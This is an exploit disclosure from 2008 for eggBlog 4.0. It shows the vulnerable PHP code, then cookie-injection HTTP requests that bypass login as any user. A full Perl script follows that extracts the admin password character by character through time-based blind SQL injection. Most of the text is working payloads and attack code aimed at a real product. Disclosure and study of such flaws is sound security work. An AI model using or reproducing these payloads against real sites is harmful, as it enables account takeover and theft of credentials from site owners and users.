eggblog40-sql.txt
Posted on 02 April 2008
# Author: __GiReX__ # mySite: girex.altervista.org # Date: 27/03/2008 - 1/04/2008 Added exploit for str0ke # CMS: eggBlog 4.0 # Site: eggblog.net # Bug: SQL Injection (cookie vars) # Type: 1 - Admin/User Authentication Bypass # Bug2: Blind SQL Injection (same vars-query) # Type: Password retrieve exploit # Var : $_COOKIE['email], $_COOKIE['password'] # Need: magic_quotes_gpc = Off # File: index.php require_once "_lib/global.php"; ... eb_pre(); # File: /_lib/globals.php require_once '_lib/user.php'; ... function eb_pre() { ... if(isset($_COOKIE['email']) && isset($_COOKIE['password']) && !isset($_SESSION['user_id'])) eb_login($_COOKIE['email'],$_COOKIE['password'],1); # Let we see function eb_login # File: /_lib/user.php function eb_login($email,$password,$key) { ... if($key==0) $password=md5($password); # Our $key is set to 1 so the password will not cprypted $sql="SELECT user_id FROM eb_users WHERE user_email="".$email."" AND md5(user_password)="".$password."""; $query=mysql_query($sql); # I have no words, 2 vars not sanizated into a SELECT query PoC 1: GET [PATH]/index.php HTTP/1.1 Host: [HOST] ... Cookie: email=@" OR "1; password=@" OR "1 # With this you will be authenticated with the fist record of table eb_user PoC 2: GET [PATH]/index.php HTTP/1.1 Host: [HOST] ... Cookie: email=@" OR "1; password=@" OR "1" AND user_id="[VICTIM_USER_ID] # For anybody you want ############################################################################################################## # Start Blind SQL Injection / Password retrieve exploit # # NOTE: Password is in plain-text so take a coffe... # ############################################################################################################## #!/usr/bin/perl -w # EggBlog v4.0 Blind SQL Injection # Password Retrieve Exploit # Coded by __GiReX__ use LWP::UserAgent; use HTTP::Request; if(not defined $ARGV[0]) { print "usage: perl $0 [host] [path] "; print "example: perl $0 localhost /eggblog/ "; exit; } my $client = new LWP::UserAgent; my @cset = (32..126, 0); my ($i, $j, $hash) = (0, 1, undef); my $host = ($ARGV[0] =~ /^http:///) ? $ARGV[0]: 'http://' . $ARGV[0]; $host .= $ARGV[1] unless not defined $ARGV[1]; banner(); check_vuln($host) or die "[-] Site not vulnerable "; while($i != $#cset) { for($i = 0; $i <= $#cset; $i++) { my ($pre_time, $post_time) = time(); $rv = check_char($host, $cset[$i], $j); $post_time = time(); info(chr($cset[$i]), $post_time - $pre_time, $hash); if($post_time - $pre_time > 3 and $rv) { $hash .= chr($cset[$i]); last; } } $j++; } print " ". (defined $hash) ? "[+] Admin password: ${hash} ": "[-] Exploit mistake: please check benchmark and charset "; print "[+] Exploit terminated "; sub banner { print " "; print "[+] EggBlog v4.0 Blind SQL Injection "; print "[+] Password Retrieve Exploit "; print "[+] Coded by __GiReX__ "; print " "; } sub check_vuln { my ($target, $res) = @_; $get = new HTTP::Request(GET, $target); $get->header('Cookie' => 'email=-1" WHERE X#; password=aaaaaaa;'); $res = $client->request($get); if($res->is_success) { return 1 if $res->content =~ /<b>Warning</b>:/; } return 0; } sub check_char { my ($target, $char, $n, $res) = @_; $get->header(Cookie => 'email=-1"+AND+'. 'CASE+WHEN'. '((SELECT(ASCII(SUBSTRING(user_password,'.$n.',1)))FROM+eb_users+WHERE+user_id=1)='.$char.')'. 'THEN+benchmark(90000000,CHAR(0))+'. 'END#; '. 'password=dummy_psw'); $res = $client->request($get); return $res->is_success; } sub info { my ($char, $delay, $hash) = @_; print STDOUT "[+] Admin password: ${hash}".$char." " unless not defined $hash; # print STDOUT "[+] Char: ${char} - Delay: ${delay} "; $| = 1; }
